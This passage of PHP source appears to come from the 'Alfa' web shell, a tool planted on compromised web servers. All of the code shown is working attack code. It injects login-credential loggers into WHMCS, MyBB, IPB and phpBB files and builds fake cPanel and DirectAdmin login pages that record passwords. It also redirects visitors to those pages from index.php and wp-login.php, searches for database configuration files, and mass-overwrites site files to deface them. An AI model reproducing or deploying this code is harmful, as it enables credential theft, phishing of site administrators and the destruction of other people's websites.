  5545. $login = '';
  5546. }
  5547. if(@is_file($login) AND @is_writable($login) AND $login != ''){
  5548. $data_login = @file_get_contents($login);
  5549. $evil_login = $code."\n".$data_login;
  5550. @file_put_contents($login, $evil_login);
  5551. hijackOutput(0,$saveto);
  5552. }else{
  5553. hijackOutput(1);
  5554. }
  5555. }
  5556. function hijackWhmcs($path,$saveto){
  5557. $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
  5558. $code=str_replace('{saveto_path}',$saveto,$code);
  5559. $conf=$path."/configuration.php";
  5560. if(@is_file($conf) AND @is_writable($conf)){
  5561. $data_conf = @file_get_contents($conf);
  5562. if(!strstr($data_conf,'?>'))$code = '?>'.$code;
  5563. $evil_conf = $data_conf."\n".$code;
  5564. @file_put_contents($conf, $evil_conf);
  5565. hijackOutput(0,$saveto);
  5566. }else{
  5567. hijackOutput(1);
  5568. }
  5569. }
  5570. function hijackMybb($path,$saveto){
  5571. $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
  5572. $find = '$loginhandler->complete_login();';
  5573. $code=str_replace('{saveto_path}',$saveto,$code);
  5574. $login=$path."/member.php";
  5575. $evil_login = "\t".$code."\n\t".$find;
  5576. if(@is_file($login) AND @is_writable($login)){
  5577. $data_login = @file_get_contents($login);
  5578. if(strstr($data_login, $find)){
  5579. $login_replace = str_replace($find,$evil_login, $data_login);
  5580. @file_put_contents($login, $login_replace);
  5581. hijackOutput(0,$saveto);
  5582. }else{
  5583. hijackOutput(1);
  5584. }
  5585. }else{
  5586. hijackOutput(1);
  5587. }
  5588. }
  5589. function hijackIPB($path,$saveto){
  5590. $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5591. $find = 'unset( $member[\'plainPassword\'] );';
  5592. $code=str_replace('{saveto_path}',$saveto,$code);
  5593. $login=$path."/admin/sources/handlers/han_login.php";
  5594. $evil_login = "\t".$find."\n\t".$code;
  5595. if(@is_file($login) AND @is_writable($login)){
  5596. $data_login = @file_get_contents($login);
  5597. if(strstr($data_login, $find)){
  5598. $login_replace = str_replace($find,$evil_login, $data_login);
  5599. @file_put_contents($login, $login_replace);
  5600. hijackOutput(0,$saveto);
  5601. }else{
  5602. hijackOutput(1);
  5603. }
  5604. }else{
  5605. hijackOutput(1);
  5606. }
  5607. }
  5608. function hijackPHPBB($path,$saveto){
  5609. $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5610. $find = 'case \'login\':';
  5611. $code=str_replace('{saveto_path}',$saveto,$code);
  5612. $login=$path."/ucp.php";
  5613. $evil_login = "\t".$find."\n\t".$code;
  5614. if(@is_file($login) AND @is_writable($login)){
  5615. $data_login = @file_get_contents($login);
  5616. if(strstr($data_login, $find)){
  5617. $login_replace = str_replace($find,$evil_login, $data_login);
  5618. @file_put_contents($login, $login_replace);
  5619. hijackOutput(0,$saveto);
  5620. }else{
  5621. hijackOutput(1);
  5622. }
  5623. }else{
  5624. hijackOutput(1);
  5625. }
  5626. }
  5627. function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
  5628. function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
  5629. if(@is_dir($dir)){
  5630. $files=@scandir($dir);
  5631. foreach($files as $key => $value){
  5632. $path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
  5633. if(!@is_dir($path)){
  5634. if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
  5635. if($e=='str'){
  5636. $content = @file_get_contents($path);
  5637. if(strpos($content, $string) !== false){
  5638. echo str_replace('\\','/',$path) . "<br>";
  5639. }
  5640. }else{
  5641. if(strstr($value,$string)){
  5642. echo str_replace('\\','/',$path) . "<br>";
  5643. }
  5644. }
  5645. $results[] = $path;
  5646. }elseif($value != "." && $value != "..") {
  5647. Alfa_StrSearcher($path,$string,$ext,$e,$results);
  5648. $results[] = $path;
  5649. }}}}
  5650. function alfafakepage(){
  5651. alfahead();
  5652. AlfaNum(9,10);
  5653. echo '<div class=header><br>
  5654. <center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\'fakepage\',null,this.clone_page.value,this.fake_root.value,\'>>\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\'post\'>
  5655. <div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">';
  5656. $cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");
  5657. foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
  5658. echo("</select></div>");
  5659. echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
  5660. <div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="'.$_SERVER["DOCUMENT_ROOT"].'/fake_page_root/"></div>
  5661. <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="'.$_SERVER["DOCUMENT_ROOT"].'/index.php"></div>
  5662. <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: '.$_SERVER["DOCUMENT_ROOT"].'/wp-login.php"></div>
  5663. <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="'.$GLOBALS['cwd'].'logs.txt"></div>
  5664. <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
  5665. <div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
  5666. $clone_page = $_POST['alfa1'];
  5667. $fake_root = $_POST['alfa2'];
  5668. $logto = $_POST['alfa4'];
  5669. $panel = $_POST['alfa5'];
  5670. $inject_to = $_POST['alfa6'];
  5671. $bind_on = $_POST['alfa7'];
  5672. $count = $_POST['alfa8'];
  5673. if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){
  5674. echo __pre();
  5675. $target = $clone_page;
  5676. $curl = new AlfaCURL();
  5677. $source_page = $curl->Send($target);
  5678. if(!empty($source_page)){
  5679. $matched_form = "";
  5680. if($panel == "cpanel"){
  5681. if(preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)){
  5682. $matched_form = $match[0];
  5683. }
  5684. }else{
  5685. if(preg_match('#<form(.*?)>#', $source_page, $match)){
  5686. $matched_form = $match[0];
  5687. }
  5688. }
  5689. if(!empty($matched_form)){
  5690. $fake = "";
  5691. $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
  5692. $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
  5693. if($panel == "cpanel"){
  5694. $port = "2083";
  5695. }else{
  5696. $target = str_replace(array("http://", "https://"), "", $target);
  5697. $port = explode(":",$target);
  5698. $port = $port[1];
  5699. }
  5700. if(substr($uri, 0, 1) == "/"){
  5701. $uri = substr($uri, 1);
  5702. }
  5703. $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
  5704. $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
  5705. if($panel == "cpanel"){
  5706. $form = '<form novalidate id="login_form" action="'.$log_url.'" method="post" target="_top" style="visibility:">';
  5707. }else{
  5708. $form = '<form action="'.$log_url.'" method="post">';
  5709. }
  5710. $fake = str_replace($matched_form, $form, $source_page);
  5711. if(@!is_dir($fake_root)){
  5712. @mkdir($fake_root, 0777, true);
  5713. }
  5714. $cookie_name = "alfa_fakepage_counter" . rand(9999,99999);
  5715. $post_user = 'user';
  5716. $post_pass = 'pass';
  5717. $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
  5718. if($panel != "cpanel"){
  5719. $post_user = 'username';
  5720. $post_pass = 'password';
  5721. $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
  5722. }
  5723. $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["'.$post_user.'"];$pass = $_POST["'.$post_pass.'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["'.$cookie_name.'"])){@setcookie("'.$cookie_name.'", 0, $cook_time, "/");$_COOKIE["'.$cookie_name.'"]=1;}if((int)$_COOKIE["'.$cookie_name.'"]>'.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';
  5724. @file_put_contents($fake_root.'/log.php', $cpanel_log);
  5725. if($panel == "cpanel"){
  5726. $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="'.$target.'/$2">', '<img class="main-logo" src="'.$target.'/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
  5727. }
  5728. @file_put_contents($fake_root.'/index.php', $fake);
  5729. $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@include("'.$fake_root.'/index.php");exit;}?>';
  5730. $bind_on_code = '<?php if((int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@header("Location: '.$uri.'");exit;}?>';
  5731. @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to));
  5732. @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on));
  5733. echo "success...!";
  5734. }else{
  5735. echo "failed...!";
  5736. }
  5737. }else{
  5738. echo("<div style='text-align:center;color:red;'>Cannot open the target...!</div>");
  5739. }
  5740. }
  5741. echo '</div>';
  5742. alfafooter();
  5743. }
  5744. function alfaarchive_manager(){
  5745. alfahead();
  5746. $file = $_POST['alfa2'];
  5747. if(!file_exists($file)){
  5748. $file = $GLOBALS['cwd'];
  5749. }
  5750. $rand_id = rand(9999, 999999);
  5751. echo '<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>';
  5752. echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
  5753. <div class="txtfont">
  5754. Archive file: <input size="50" id="target" type="text" name="file" value="'.$file.'">
  5755. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5756. if($_POST['alfa5']=='>>'){
  5757. //echo __pre();
  5758. echo '<hr><div style="margin-left: 12px;" archive_full="phar://'.$file.'" archive_name="'.basename($file).'" id="archive_dir_'.$rand_id.'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
  5759. echo '<div style="padding: 10px;" id="archive_base_'.$rand_id.'">';
  5760. __alfa_open_archive_file($file, $rand_id);
  5761. echo '</div>';
  5762. }
  5763. echo '</div>';
  5764. alfafooter();
  5765. }
  5766. function __alfa_open_archive_file($arch, $base_id=0){
  5767. try{
  5768. $files = array();
  5769. $dirs = array();
  5770. $archive = new PharData($arch);
  5771. foreach($archive as $file) {
  5772. $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
  5773. if($file->isDir()) {
  5774. $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
  5775. }else{
  5776. $file_size = @filesize($file->getPathname());
  5777. $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
  5778. }
  5779. }
  5780. function __alfa_open_archive_usort($a, $b){
  5781. return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
  5782. }
  5783. usort($dirs, "__alfa_open_archive_usort");
  5784. usort($files, "__alfa_open_archive_usort");
  5785. $files = array_merge($dirs, $files);
  5786. echo '<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>';
  5787. $icon = '<img class="archive-icons" src="'.findicon('..','dir').'" width="30" height="30">';
  5788. echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="'.dirname($arch.'.php').'">'.$icon.'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
  5789. foreach($files as $file){
  5790. $icon = '<img class="archive-icons" src="'.findicon($file['name'],$file['type']).'" width="30" height="30">';
  5791. if($file["type"] == "dir"){
  5792. echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="'.$file["path"].'" fname="'.$file["name"].'">'.$icon.'<span class="archive-name archive-type-dir">| '.$file["name"].' |</span></a><td>dir</td><td>'.$file["modify"].'</td><td>-</td></tr>';
  5793. }else{
  5794. echo "<tr><th><a base_id='".$base_id."' class='archive-file-row' onclick=\"editor('".$file["path"]."','auto','','','','file');\">".$icon."<span class='archive-name archive-type-file' fname='".$file["name"]."'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";
  5795. }
  5796. }
  5797. echo '</table>';
  5798. }catch(Exception $e){
  5799. echo("0");
  5800. }
  5801. }
  5802. function alfaopen_archive_dir(){
  5803. $dir = $_POST["alfa1"];
  5804. $base_id = $_POST["alfa2"];
  5805. __alfa_open_archive_file($dir, $base_id);
  5806. }
  5807. function alfaconfig_grabber(){
  5808. alfahead();
  5809. echo '<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>';
  5810. echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
  5811. <div class="txtfont">
  5812. Dir: <input size="50" id="target" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
  5813. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5814. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5815. $dir = $_POST['alfa2'];
  5816. $ext = $_POST['alfa3'];
  5817. if($_POST['alfa5']=='>>'){
  5818. echo __pre();
  5819. Alfa_ConfigGrabber($dir, $ext);
  5820. }
  5821. echo '</div>';
  5822. alfafooter();
  5823. }
  5824. function Alfa_ConfigGrabber($dir, $ext) {
  5825. $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
  5826. $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
  5827. if(@is_readable($dir)){
  5828. $globFiles = @glob("$dir/*.$ext");
  5829. $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
  5830. $blacklist = array();
  5831. foreach ($globDirs as $dir) {
  5832. if(!@is_readable($dir)||@is_link($dir)) continue;
  5833. @Alfa_ConfigGrabber($dir, $ext);
  5834. }
  5835. foreach ($globFiles as $file){
  5836. $filee = @file_get_contents($file);
  5837. if(preg_match($pattern, $filee)){
  5838. echo "<div><span>$file</span> <a style='cursor:pointer;' onclick=\"editor('".$file."','auto','','','','file');\">[ View file ]</a></div>";
  5839. }
  5840. }
  5841. }
  5842. }
  5843. function alfasearcher(){
  5844. alfahead();
  5845. echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
  5846. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
  5847. echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
  5848. <div class="txtfont">
  5849. Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
  5850. Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
  5851. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5852. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5853. $dir = $_POST['alfa2'];
  5854. $ext = $_POST['alfa3'];
  5855. $method = $_POST['alfa4'];
  5856. if($_POST['alfa5']=='>>'){
  5857. echo __pre();
  5858. if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
  5859. Alfa_Searcher($dir,trim($ext),$method);
  5860. }
  5861. }
  5862. if($_POST['alfa1']=='str'){
  5863. echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
  5864. <div class="txtfont">
  5865. Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
  5866. String: <input type="text" name="string" value="">
  5867. Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
  5868. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5869. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5870. $dir = $_POST['alfa2'];
  5871. $string = $_POST['alfa3'];
  5872. $ext = $_POST['alfa5'];
  5873. if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
  5874. echo __pre();
  5875. Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
  5876. }
  5877. }
  5878. echo '</div>';
  5879. alfafooter();
  5880. }
  5881. function alfaMassDefacer(){
  5882. alfahead();
  5883. AlfaNum(5,6,7,8,9,10);
  5884. echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
  5885. echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
  5886. Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  5887. DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
  5888. </form>';
  5889. $dir = $_POST['alfa1'];
  5890. $defpage = $_POST['alfa2'];
  5891. $method = $_POST['alfa3'];
  5892. $fCurrent = $GLOBALS['__file_path'];
  5893. if($_POST['alfa4'] == '>>'){
  5894. if(!empty($dir)){
  5895. if(@is_dir($dir)){
  5896. if(@is_readable($dir)){
  5897. if(@is_file($defpage)){
  5898. if($dh = @opendir($dir)){
  5899. echo __pre();
  5900. while (($file = @readdir($dh)) !== false){
  5901. if($file == '..' || $file == '.')continue;
  5902. $newfile=$dir.$file;
  5903. if($fCurrent == $newfile)continue;
  5904. if(@is_dir($newfile)){
  5905. Alfa_ReadDir($newfile,$method,$defpage);
  5906. }else{
  5907. if(!@is_writable($newfile))continue;
  5908. if(!@is_readable($newfile))continue;
  5909. Alfa_Rewriter($newfile,$file,$defpage,$method);
  5910. }
  5911. }
  5912. closedir($dh);
  5913. }else{__alert('<font color="red">Error In OpenDir...</font>');}
  5914. }else{__alert('<font color="red">DefPage File NotFound...</font>');}
  5915. }else{__alert('<font color="red">Directory is not Readable...</font>');}
  5916. }else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
  5917. }else{__alert('<font color="red">Dir is Empty...</font>');}
  5918. }
  5919. echo '</div>';
  5920. alfafooter();
  5921. }
  5922. function Alfa_ReadDir($dir,$method='',$defpage=''){
  5923. if(!@is_readable($dir)) return false;
  5924. if (@is_dir($dir)) {
  5925. if ($dh = @opendir($dir)) {
  5926. while(($file=readdir($dh))!==false) {
  5927. if($file == '..' || $file == '.')continue;
  5928. $newfile=$dir.'/'.$file;
  5929. if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
  5930. if(@is_file($newfile)){
  5931. if(!@is_readable($newfile))continue;
  5932. Alfa_Rewriter($newfile,$file,$defpage,$method);
  5933. }
  5934. }
  5935. closedir($dh);
  5936. }
  5937. }
  5938. }
  5939. function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
  5940. if(!@is_writable($dir)) return false;
  5941. if(!@is_readable($dir)) return false;
  5942. $defpage=@file_get_contents($defpage);
  5943. if($m == 'index'){
  5944. $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
  5945. if(in_array(strtolower($file),$indexs)){
  5946. @file_put_contents($dir,$defpage);
  5947. echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
  5948. }
  5949. }elseif($m=='all'){
  5950. @file_put_contents($dir,$defpage);
  5951. echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
  5952. }
  5953. }
  5954. function alfaGetDisFunc(){
  5955. alfahead();
  5956. echo '<div class="header">';
  5957. $disfun = @ini_get('disable_functions');
  5958. $s = explode(',',$disfun);
  5959. $f = array_unique($s);
  5960. echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
  5961. $i=1;
  5962. foreach($f as $s){
  5963. $s=trim($s);
  5964. if(function_exists($s)||!is_callable($s))continue;
  5965. echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
  5966. echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
  5967. $i++;
  5968. }
  5969. echo '</table></center>';
  5970. echo '</div>';
  5971. alfafooter();
  5972. }
  5973. function Alfa_Create_A_Tag($action,$vals){
  5974. $nulls = array();
  5975. foreach($vals as $key => $val){
  5976. echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
  5977. for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
  5978. $f = implode(',',$nulls);
  5979. echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
  5980. unset($nulls);
  5981. }
  5982. }
  5983. function Alfa_Searcher($dir, $ext, $method) {
  5984. if(@is_readable($dir)){
  5985. if($method == 'all')$ext = '*';
  5986. if($method == 'dirs')$ext = '*';
  5987. $globFiles = @glob("$dir/*.$ext");
  5988. $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
  5989. $blacklist = array();
  5990. foreach ($globDirs as $dir) {
  5991. if(!@is_readable($dir)||@is_link($dir)) continue;
  5992. @Alfa_Searcher($dir, $ext, $method);
  5993. }
  5994. switch($method){
  5995. case "files":
  5996. foreach ($globFiles as $file){
  5997. if(@is_writable($file)){
  5998. echo "$file<br>";
  5999. }
  6000. }
  6001. break;
  6002. case "dirs":
  6003. foreach ($globFiles as $file){
  6004. if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
  6005. echo dirname($file).'<br>';
  6006. $blacklist[] = dirname($file);
  6007. }
  6008. }
  6009. break;
  6010. case "all":
  6011. foreach ($globFiles as $file){
  6012. echo $file.'<br>';
  6013. }
  6014. break;
  6015. }
  6016. unset($blacklist);
  6017. }
  6018. }
  6019. function AlfaiFrameCreator($f,$width='100%',$height='600px'){
  6020. return('<iframe src="'.__ALFA_DATA_FOLDER__."/".$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
  6021. }
  6022. class AlfaCURL {
  6023. public $headers;
  6024. public $user_agent;
  6025. public $compression;
  6026. public $cookie_file;
  6027. public $proxy;
  6028. public $path;
  6029. public $ssl = true;
  6030. public $curl_status = true;
  6031. function __construct($cookies=false,$compression='gzip',$proxy=''){
  6032. if(!extension_loaded('curl')){$curl_status = false;return false;}
  6033. $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
  6034. $this->headers[] = 'Connection: Keep-Alive';
  6035. $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
  6036. $this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
  6037. $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
  6038. $this->compression=$compression;
  6039. $this->proxy=$proxy;
  6040. $this->cookies=$cookies;
  6041. if($this->cookies)$this->cookie($this->path);
  6042. }
  6043. function cookie($cookie_file) {
  6044. if (_alfa_file_exists($cookie_file,false)) {
  6045. $this->cookie_file=$cookie_file;
  6046. }else{
  6047. @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
  6048. $this->cookie_file=$cookie_file;
  6049. @fclose($this->cookie_file);
  6050. }
  6051. }
  6052. function Send($url,$method="get",$data=""){
  6053. if(!$this->curl_status){return false;}
  6054. $process = curl_init($url);
  6055. curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
  6056. curl_setopt($process, CURLOPT_HEADER, 0);
  6057. curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
  6058. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  6059. curl_setopt($process, CURLOPT_ENCODING , $this->compression);
  6060. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  6061. if($this->ssl){
  6062. curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
  6063. curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
  6064. }
  6065. if($this->cookies){
  6066. curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
  6067. curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
  6068. }
  6069. if($this->proxy){
  6070. curl_setopt($process, CURLOPT_PROXY, $this->proxy);
  6071. }
  6072. if($method=='post'){
